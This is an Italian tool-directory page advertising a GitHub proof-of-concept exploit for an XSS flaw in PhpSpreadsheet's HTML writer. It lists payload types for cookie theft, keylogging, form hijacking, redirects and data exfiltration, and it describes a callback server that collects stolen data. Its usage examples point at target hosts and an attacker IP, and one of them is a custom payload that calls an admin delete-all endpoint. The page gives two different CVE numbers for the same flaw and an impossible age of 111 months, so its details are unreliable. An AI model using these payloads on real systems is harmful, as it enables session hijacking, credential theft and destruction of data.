Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-47875-PhpSpreadsheet-XSS-PoC — Questo è un PoC/Exploit per la vulnerabilità XSS di PhpSpreadsheet CVE-2024-47875 | Kitploit
Strumenti/GitHubGitHub/roj1py/cve-2024-47875-phpspreadsheet-xss-poc
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebEsfiltrazione DatiCommand and Control
GitHubroj1py/cve-2024-47875-phpspreadsheet-xss-poc

CVE-2024-47875-PhpSpreadsheet-XSS-PoC

Questo è un PoC/Exploit per la vulnerabilità XSS di PhpSpreadsheet CVE-2024-47875

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
111 mesi faNon ancora revisionato

CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

Panoramica

Questa è una PoC per la CVE-2025-22131, una vulnerabilità di Cross-Site Scripting (XSS) in PhpSpreadsheet nelle versioni precedenti alla 2.2.2, 2.1.2 e 1.29.4. La vulnerabilità risiede nella funzione generateNavigation(), che non riesce a sanificare i nomi dei fogli durante la conversione da XLSX a HTML, consentendo l'iniezione di JavaScript dannoso.

CVE ID: CVE-2024-47875

Avviso GitHub: GHSA-79xx-vf93-p7cx

Versioni interessate: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

Autore: Roj

Licenza: MIT

Repository: Repo PoC


Caratteristiche

📄 Genera file XLSX dannosi con payload XSS personalizzabili

🛠️ Supporta più tipi di payload:

cookie_theft: Ruba i cookie di sessione

redirect: Reindirizza gli utenti a un sito controllato dall'attaccante

alert: Mostra un avviso di test per la PoC

keylogger: Cattura le sequenze di tasti

form_hijack: Intercetta l'invio dei moduli

data_exfil: Esfiltra dati da un endpoint specificato

🌐 Server HTTP integrato per catturare i callback dell'exploit

⬆️ Carica file XLSX dannosi su un endpoint di destinazione

💾 Salva i dati catturati (ad es. cookie) in un file JSON

🎨 Output terminale colorato per una migliore leggibilità

🔍 Logging verboso per il debug


Utilizzo

root@kitploit:~
python exploit.py -h

🚀 Esempi di utilizzo:

root@kitploit:~
# Attacco di base per il furto di cookie
python3 exploit.py http://target.htb 10.10.16.50

# Endpoint di upload personalizzato
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Diversi tipi di payload
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Payload XSS personalizzato
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"

Spero di ricevere feedback, in bocca al lupo a tutti voi.

Scarica lo strumento